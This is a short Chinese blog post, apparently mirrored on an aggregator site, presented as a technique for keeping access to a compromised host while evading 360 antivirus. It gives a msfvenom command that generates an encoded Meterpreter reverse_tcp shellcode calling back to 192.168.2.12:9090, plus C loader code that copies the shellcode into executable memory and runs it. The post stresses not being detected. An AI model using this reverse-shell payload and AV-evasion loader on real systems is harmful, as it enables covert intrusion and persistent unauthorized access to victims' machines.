免杀 - 走看看

zoukankan html css js c++ java

免杀
免杀

在拿到一枚shell后，我们必须要做好权限维持，如果目标主机上有AV的话，我们一定要做好免杀处理，不能被发现！宁可不攻击也不要被发现，所以免杀是在内网渗透过程中最关键的一步！今天分享一个绕过某60的免杀技巧，总结就是：只要会代码，免杀随便绕！

Metasploit 生成 C 过免杀 360

Metasploit

Msf 相比大家都看过我直接写的笔记，大家也都会使用，这里也不一一细讲，直接上操作：

首先使用MSF的shikata_ga_nai构建x86一个shellcode：
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c
```
然后使用 VC 编译（我用的是 VC 2019）：
```
#include <stdio.h>#include <windows.h>
unsigned const char payload[] = "这里是生成的shellcode";
size_t size = 0;
int main(int argc, char** argv) {
    char* code;
    printf("Hello Hack saul!\n");
    code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    memcpy(code, payload, size); 
    ((void(*)())code)();
    return(0);}
```
字节可以改改，然后运行上线：
查看全文

相关阅读:
How to Install Linux, Apache, MySQL, PHP (LAMP) stack on CentOS 6 【Reliable】
可以把一些常用的方法，写入js文件，引入html界面
 把功能写在方法里，函数化，方法化
 那些SQL语句
 Linux&shell之高级Shell脚本编程-创建菜单
 Linux&shell之高级Shell脚本编程-创建函数
 PHP isset()与empty()的使用区别详解
 如何打开mo文件并修改 PoEdit
Linux&shell之如何控制脚本
 Linux&shell之显示数据

原文地址：https://www.cnblogs.com/lzkalislw/p/15644104.html

Copyright © 2011-2022 走看看